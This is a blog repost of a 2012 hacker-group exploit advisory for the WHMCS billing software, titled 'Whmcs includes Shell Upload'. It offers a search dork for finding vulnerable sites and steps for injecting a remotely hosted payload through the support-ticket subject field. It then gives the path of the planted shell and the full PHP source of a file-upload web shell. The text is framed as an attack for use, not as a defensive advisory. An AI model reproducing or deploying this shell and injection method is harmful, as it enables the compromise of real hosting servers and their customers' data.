10 thg 11, 2012

Whmcs includes Shell Upload


#########################################################
# Vuln Title: Whmcs includes Shell Upload
# Author: TMT
# Date: 27/10/2012
# Software Link: http://www.whmcs.com/
# Mail : 0168800549@yahoo.com
# Tested on: [relevant os]
# Dork : inurl: submitticket.php?step=2
# Website : http://vnhack.us | http://tmt-today.com



##########################################################
#
#       010101010101010101010101010101010101010101010101010101010
#       1                     VNHGROUP                          0
#       0              H4cking - S3cure - Und3rGroup            0
#       010101010101010101010101010101010101010101010101010101010
#
#
############################################################
#
#[+]Exploitation:
#
#############################################################
#[+]./_ Portal Home > Client Area > Support Tickets > Submit Ticket -> Subject ->
#[+]./_http://vnh.me/1/Whmcs.txt
#[+]./_Run Shell
#[+]   _Http://target.com/whmcs/kir.php
#[+]   _Http://vietxyz.com  // Demo
#[+] ./_ Source Upload

    <?php
    echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
    if( $_POST['_upl'] == "Upload" ) {
      if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Chết con mẹ bạn ,bạn đã upload shell thành công rồi :)) #[+]!!!</b><br><br>'; }
       else { echo '<b>Chết con mẹ bạn bạn đã đéo up được shell rồi , nó chmod kỹ quá :)) chết đi ạn ơi !!!</b><br><br>'; }
    }
    ?>

###################################################################
#[+] _/ Video http://vnhack.us/forum/showthread.php?t=3363
#[+]_/ More Details:
###################################################################
#[+]_/ Http://www.vnhack.us | http://tmt-today.com
##################################################################
##################################################################
#[+]_/ TMT - And All Members VNhgroup
#################################################################

Không có nhận xét nào:

Đăng nhận xét